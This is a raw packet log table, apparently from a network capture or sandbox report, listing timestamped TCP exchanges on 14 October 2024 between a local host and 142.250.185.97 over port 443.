| Oct 14, 2024 09:12:10.085786104 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.085832119 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.093107939 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.093166113 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.161720037 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.161870956 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.161883116 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.161911964 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.161932945 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.161969900 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.161993980 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.162043095 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.162081957 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.162142038 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.162753105 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.162806988 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.162847996 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.162899971 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.169007063 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.169094086 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.169105053 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.169234991 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.175254107 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.175333023 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.175342083 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.175404072 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.181766033 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.181850910 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.181859016 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.181901932 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.188009977 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.188080072 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.188088894 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.188134909 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.194056988 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.194118977 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.194128036 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.194190979 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.199922085 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.199991941 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.200000048 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.200043917 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.205626965 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.205703020 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.205710888 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.205761909 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.211558104 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.211621046 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.211630106 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.211677074 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.217426062 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.217504025 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.232266903 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.232350111 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.232362986 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.232409954 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.256342888 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.256442070 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.256485939 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.256542921 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.256582022 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.256634951 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.256676912 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.256733894 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.256774902 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.256831884 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.256872892 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.256921053 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.256966114 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.257013083 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.257057905 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.257108927 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.257148027 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.257200956 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.257237911 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.257286072 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.257334948 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.257386923 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.257456064 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.257512093 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.259371042 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.259437084 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.259476900 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.259536028 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.264180899 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.264251947 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.264282942 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.264341116 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.269237041 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.269301891 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.269321918 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.269385099 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.273978949 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.274048090 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.274060965 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.274113894 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.278605938 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.278812885 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.278822899 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.278882027 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.283349037 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.283416033 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.283453941 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.283509016 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.288068056 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.288137913 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.288151026 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.288197041 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.292443037 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.292509079 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.292515993 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.292563915 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.297283888 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.297355890 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.297364950 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.297414064 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.301557064 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.301631927 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.301640034 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.301690102 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.305716991 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.305759907 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.305780888 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.305792093 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.305807114 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.305851936 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.310029030 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.310103893 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.310116053 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.310164928 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.313776016 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.313848972 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.313880920 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.313941002 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.317689896 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.317769051 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.317789078 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.317843914 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.321608067 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.321683884 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.321696043 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.321753025 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.325136900 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.325220108 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.325229883 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.325274944 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.328670979 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.328773022 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.328780890 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.328839064 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.332263947 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.332328081 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.350490093 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.350565910 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.350610971 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.350668907 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.350711107 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.350756884 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.350982904 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.351032972 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.351073027 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.351119041 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.351159096 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.351210117 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.351248026 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.351294041 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.351330996 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.351388931 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.351901054 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.351959944 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.352060080 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.352113962 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.352252960 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.352300882 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.352339983 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.352385044 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.352421999 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.352471113 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.353755951 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.353804111 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.353864908 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.353907108 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.353945971 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.353998899 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.355402946 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.355467081 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.359138012 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.359194994 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.359241962 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.359297037 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.359328032 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.359376907 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.359430075 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.359479904 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.363959074 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.364012003 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.364051104 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.364109993 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.364151955 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.364198923 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.364228010 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.364278078 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.368504047 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.368567944 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.368593931 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.368642092 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.368676901 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.368736029 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.370534897 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.370601892 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.373130083 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.373184919 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.373220921 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.373266935 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.373308897 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.373353958 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.373394966 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.373439074 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.373477936 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.373529911 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.378072023 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.378129959 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.378158092 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.378213882 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.378442049 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.378494024 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.378525019 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.378577948 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.382710934 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.382764101 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.382797956 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.382853985 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.382889032 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.382945061 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.382986069 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.383033991 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.387101889 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.387152910 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.387208939 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.387255907 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.387298107 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.387342930 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.387401104 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.387443066 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.391602039 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.391665936 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.391674995 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.391720057 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.391733885 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.391774893 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.391782045 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.391827106 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.396158934 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.396209955 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.396229982 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.396239042 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.396256924 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.396301031 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.396306038 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.396351099 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.400645018 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.400688887 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.400697947 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.400746107 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.400753021 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.400790930 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.400791883 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.400803089 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.400830984 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.400876045 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.404383898 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.404447079 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
